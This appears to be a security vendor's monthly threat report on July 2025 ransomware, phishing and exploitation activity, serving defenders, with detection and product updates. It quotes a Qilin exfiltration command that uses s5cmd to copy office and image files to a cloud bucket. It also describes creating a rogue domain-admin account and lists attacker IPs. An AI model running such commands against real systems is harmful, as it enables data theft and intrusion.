Threat View from the Lens of Huntress Adversary Tactics: July 2025

We're seeing a new emerging ransomware variant called Crux. So far, we’ve spotted Crux in two incidents since July 2025. There isn’t public reporting on Crux ransomware yet, but according to a ransom note in an incident we detected, Crux claims to be part of BlackByte, a ransomware group with multiple malware variants dating back to 2021.

Excerpt from Crux ransomware ransom note

We’ve seen the following threat activity associated with the Crux ransomware incidents:

• The use of RClone (typically used by attackers for data exfiltration)
• Attempts to install drivers and remotely dump the contents of the Windows Registry
• Attempts to disable Windows Recovery, which makes system restoration harder for victims

Process tree showing threat actor disabling Windows Recovery

We saw separate incidents in June and July with a similar threat activity pattern: threat actors compromising MSPs’ Atera Remote Monitoring and Management (RMM) instances and then targeting the downstream customers, installing Cloudflare tunnels and, in some cases, deploying Akira ransomware.

Process tree showing how the threat actor compromised an MSP Atera RMM instance

We shared details in a two-part blog series on an initial attack in mid-June, and several subsequent incidents with similar tactics, techniques,and procedures (TTPs) - like the same Cloudflare tunnel token account tags, threat actor workstation names, and identical indicators of compromise (IOCs).

Recently, we came across threat actors exfiltrating data with s5cmd, an open-source tool.  According to GitHub, this is “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.”

We saw s5cmd used in a Qilin ransomware attack in the following command line:

s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

The threat actor accessed the infrastructure via Remote Desktop Protocol (RDP), used s5cmd.exe for data exfiltration, and ultimately used PSExec to push the ransomware executable and launch it on other endpoints.

We’ve noticed a recent jump in phishing attacks using fake hotel booking websites (shout out to Austin Worline, Security Operations Analyst, for flagging this trend!).

The phishing example below uses a fake captcha, a technique that tricks users into solving a captcha challenge via social engineering to drop malware. Here’s what happened:

• A user opened an email with a malicious link for a phony hotel booking webpage and a bogus captcha challenge. Then, the user unknowingly executed a malicious captcha payload, which launched a suspicious payload for persistence.

Webpage instructing the target to solve a fake captcha challenge as part of a phishing attack

In another incident, a user:

• Got a phishing email in their Outlook account with a suspicious shortened URL
• Directed user activity to another page ("https[:]//2f-regdocuments-approval3d[.]com/ssa/red[.]php"), triggering a  malicious MSI installer
• Installed unauthorized instances of RMM tools, including Atera and Splashtop RMM

A recent project by the Tactical Response team has been to track successful ransomware incidents. The data tracked by the team gives us valuable information about the types of ransomware groups that are targeting our customer base, as well as the vectors that they target for initial access.

As seen in the chart below, the majority of ransomware incidents tracked by Tactical Response are linked to Akira (52.8%). Coming in behind Akira are Qilin (in 11.1% of tracked incidents), LockBit (8.3%) and Crux (8.3%). It’s worth noting that these findings are developed from ransomware incidents tracked specifically by Tactical Response, rather than all ransomware incidents that pass through the SOC.

Breakdown of ransomware groups tracked by Tactical Response

The Tactical Response team’s data also shows us the top initial access vectors used by ransomware groups. While the initial access for the majority of cases could not be determined (and other cases are still under investigation), threat groups got in through VPNs in 27.8% of incidents. They also targeted RDP in 11.1% of incidents and RMMs in 2.8% of cases.

Breakdown of initial access vectors for ransomware groups

The relatively new D4rk4rmy ransomware group claimed responsibility for high-profile attacks on Casino de Monte-Carlo and Big Rock Resort, drawing attention to aggressive targeting tactics, like potential data exfiltration and encryption against entertainment and hospitality sectors. This group’s legitimacy is under dispute, however many of their victims do appear to have been compromised by infostealer malware installs prior to their claims.  It is believed that the D4rk4rmy ransomware group buys these available infostealer logs prior to these claims, and is perhaps embellishing the truth of the level of their compromises.  Regardless of legitimacy this tactic highlights the common shift of many ransomware groups utilizing these resources in order to target victims.

China-linked hackers, including the threat actor known as Storm-2603, ramped up exploitation of Microsoft SharePoint servers as initial access vectors through a zero-day vulnerability chain dubbed ToolShell, including CVE-2025-49706 (an improper authentication spoofing flaw) and CVE-2025-49704 (an insecure deserialization vulnerability). This exploitation leads to SYSTEM-level access on affected systems and subsequent deployment of Warlock (aka X2anylock) and LockBit Black ransomware variants.  Ransomware is deployed via a custom command-and-control (C2) framework named AK47 that implements DNS-controlled backdoors, persistent remote access, lateral movement between endpoints, and multi-stage payload delivery.

A harsh reminder of ransomware's devastating impact is the collapse of Einhaus-Gruppe, a major phone repair and insurance firm. It was hit by the Royal hack group and paid about $230,000 in ransom. After making the payment, Einhaus-Gruppe was forced to cut their workforce from 170 employees to eight despite drastic measures like selling property and liquidating investments, calling attention to the financial and operational ruin of these attacks even if ransom demands are met.

Meanwhile, the cross-platform Anubis ransomware is emerging as a dual threat. The ransomware infects both Android and Windows devices to encrypt files while stealing credentials. It is often distributed via phishing or malicious apps, posing significant risks to individual users and enterprises alike. This ransomware strain has introduced a new wiper feature that remotely wipes systems if the ransom is not paid. This will be introduced in additional ransomware families in the future and emphasizes the need for robust backup systems and post-incident isolation steps.

In the past month, several high-profile cybersecurity busts have targeted notorious threat actors, bringing key victories for law enforcement. On July 8, the U.S. Justice Department arrested Xu Zewei, a 33-year-old Chinese national affiliated with the Ministry of State Security, for orchestrating the HAFNIUM campaign that exploited vulnerabilities in over 60,000 Microsoft Exchange servers worldwide.  This campaign was the precursor to stolen COVID-19 research from multiple U.S. universities. Zewei is facing charges of wire fraud and computer damage, with up to 20 years in prison.

In mid-July, the UK's National Crime Agency arrested four young suspects, aged 17 to 20, linked to ransomware and data theft operations against major retailers, including M&S, Co-op, and Harrods. They’re being charged under the Computer Misuse Act and for blackmail.  This arrest included alleged members of the Scattered Spider (UNC3944) group, and has momentarily shut down their phishing and ransomware campaigns against North American sectors. This group used tactics like push bombing and Raccoon Stealer malware, and several copycat operations continue to cause problems.

And finally, towards the end of July, Operation Checkmate, a collaborative effort involving U.S. agencies, Europol, and other international partners, seized the .onion extortion sites of the BlackSuit ransomware group. This disrupted their data leak and negotiation platforms, though the actors announced they may reemerge under the Chaos brand.  Authorities stated that this was part of a multiple-phase takedown, with additional arrests and takedowns scheduled to occur in the next couple of months.

We’ve uncovered active Akira ransomware intrusions exploiting SonicWall appliances, letting adversaries bypass multi-factor authentication (MFA) and gain unauthorized access to internal networks. Using tactics similar to sophisticated ransomware groups like Akira, these threat actors swiftly pivot to domain controllers where they establish persistence by creating rogue user accounts like backupSQL with weak passwords like Password123$, and then elevating them to Domain Admins via commands like “net user” and “net group”. This chain of compromise typically results in Akira ransomware deployment and data exfiltration, with indicators of compromise being observed from malicious IPv4 addresses such as 142.252.99[.]59, 45.86.208[.]240, 77.247.126[.]239, 193.239.236[.]149, 104.238.205[.]105, 104.238.220[.]216, 193.163.194[.]7, and 194.33.45[.]155, often originating from SSL VPN logins.

Visualization of the timeline of attacks

We saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) in a customer environment  on July 1, one day after public disclosure.

CVE-2025-47812 is a null byte and Lua injection flaw that leads to root/SYSTEM-level remote code execution if exploited. The vulnerability was first publicly disclosed on June 30 by Julien Ahrens in versions prior to 7.4.4 of the Wing FTP Server, its file transfer protocol software for Windows, Linux, and macOS. Organizations running Wing FTP Server should update to the fixed version, version 7.4.4, as soon as possible.

WingFTP RCE exploitation (CVE-2025-47812) seen in the process tree

This past month, the Detection Engineering team deployed 85 new detection rules. These additions are strategically designed to identify emerging attack methodologies that could impact organizational operations. The focus included crucial visibility into:

• Hack Tools & Initial Access: Detecting various hack tools and their execution, suspicious PowerShell activity related to ClickFix initial access, rogue RMM installations, and malicious script execution from common entry points like archives in temporary folders.
• Privilege Escalation & Defense Evasion: Uncovering attempts to escalate privileges, abuse service permissions to hide activity, tamper with event logs, or use encoded commands to bypass defenses on both Windows and Linux systems.
• Ransomware & Malware Activity: Identifying patterns associated with known ransomware families, typical malware payload execution, and suspicious processes that indicate active infections.
• Data Exfiltration & Command and Control: Spotting unauthorized data transfers to suspicious platforms and network connections that might indicate adversary communication channels.
• SharePoint CVE-2025-49706 + CVE-2025-49704: Detects in-the-wild exploitation of SharePoint servers, which drops a webshell to export machine keys.

Additionally, 157 existing detection rules underwent meticulous review and refinement. Key improvements included:

• Refining Initial Access Detections: Sharpening our ability to identify suspicious PowerShell execution from the registry, encoded PowerShell download activity, and various forms of suspicious execution originating from common user actions.
• Strengthening Active Directory & Authentication Monitoring: Enhancing detections for Active Directory user backdoors, suspicious VPN authentications (especially with generic accounts), and unusual login patterns that could indicate compromised credentials.
• Improving Defense Evasion & Persistence Detection: Boosting our capabilities to identify malicious service creation, modifications to system services, and the use of legitimate tools in suspicious ways to establish persistence or evade defenses.
• Enhancing Lateral Movement & Reconnaissance Insights: Tuning rules to better detect internal network reconnaissance (e.g., domain discovery commands, user enumeration), lateral movement attempts, and the use of remote access tools in unusual locations.

Windows

Akira win: Akira is a major threat in the ransomware landscape, and recently Huntress Managed EDR scored a major win by successfully preventing Akira from encrypting a host. The automated protection built into the agent defended against multiple attempts until an analyst was able to isolate the host. The SOC was also able to pull artifacts from the ransomware - which we can now use to better refine our behavior detection efforts.  

Bonus: If the customer had had SIEM installed, we would have been alerted 10 minutes earlier - demonstrating how SIEM helps neutralize threats earlier in the attack chain to give a leg up over attackers!

macOS

Expanded macOS Foothold Support: Foothold support for macOS has been expanded to cover the latest persistence technology and older mechanisms used by Mac malware, preventing evasion of Huntress detection.

Save and Schedule Searches

SIEM customers can now save queries and schedule them to run on a recurring basis. The results will be automatically emailed - this makes it easy to monitor key data without any additional manual effort.

Added support and detection logic

SIEM has added support for Cisco ASA (Adaptive Security Appliance) and Cisco Firepower Threat Defense as log sources. This will enable deeper visibility and streamlined analysis of network security events.

Additionally, FortiGate detection logic has been enhanced to support non-CEF formatted logs - allowing broader compatibility and more accurate parsing.

Successful brute force detection

A new VPN brute force detection is being tuned and has already caught "bad stuff" in testing, with brute force attack hunted down by our SOC.

Spearphishing simulation now in GA

Building upon our new Threat Simulator capability, we have released a new Spearphishing Simulation to the public, as an extension to August’s Managed Learning. The first simulation on OSINT was well received, and this new spearphishing simulation is no different. 93% of early participants said they gained new knowledge about hackers through the simulation.

Other updates

The SAT team also released Together Mode Learning - a new feature enabling admins to bring learners together in person (or through a screen-share virtual session) to complete security awareness training sessions together. Admins can also mark everyone as completed in the portal.

The team unveiled a new capability to the Learner models allowing us to associate more than one email with a single learner.

Finally, gradual rollout of SCIM support for learners is underway. Current partners and customers can reach out to their Huntress Account Manager if they are interested in joining the Beta.

This month’s Tradecraft Tuesday was a fun one: it centered around Hacking on Hollywood. Greg Linares, Matt Kiely, and John Hyland talked about the most accurate - and the worst - hacking scenes in popular film and TV shows.  

Haven’t signed up for our Tradecraft Tuesday series? Register here to check out our August episode “A Journey to the Center of the Dark Web."

Greg Linares joined the renowned Darknet Diaries podcast, where he talked about everything from being the youngest hacker to be arrested in Arizona to wild tales during his time at eEye. You can listen to the podcast here.